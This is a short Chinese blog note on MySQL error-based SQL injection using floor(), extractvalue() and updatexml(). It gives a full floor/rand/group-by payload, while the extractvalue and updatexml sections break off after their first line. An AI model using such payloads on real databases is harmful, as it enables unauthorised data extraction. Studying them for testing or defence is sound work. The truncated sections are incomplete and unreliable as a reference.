报错注入中的三个函数:floor()、extractvalue()、updatexml()
一、floor函数报错【count + group by 主键冲突导致报错】
1 | select 1 from (select count(*),concat(floor(rand(0)*2))x from information_schema.tables group by x)a; |
MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数,分别是
ExtractValue() 和 UpdateXML()
因此在mysql 小于5.1.5中不能用 ExtractValue 和 UpdateXML 进行报错注入。
1 | extractvalue(XML_document, XPath_string); #查询 |
二、extractvalue()函数报错注入
1 | 1、爆库: |
三、updatexml函数报错注入
1 | 首先了解下updatexml()函数 |
本文作者:
kur08a
本文链接: https://kur08a.github.io/2022/03/27/SQLI%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%E8%A1%A5%E5%85%85-%E6%8A%A5%E9%94%99%E4%B8%89%E5%87%BD%E6%95%B0/
版权声明: 本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可。转载请注明出处!
本文链接: https://kur08a.github.io/2022/03/27/SQLI%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%E8%A1%A5%E5%85%85-%E6%8A%A5%E9%94%99%E4%B8%89%E5%87%BD%E6%95%B0/
版权声明: 本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可。转载请注明出处!
![知识共享许可协议](https://i.creativecommons.org/l/by-nc-sa/4.0/88x31.png)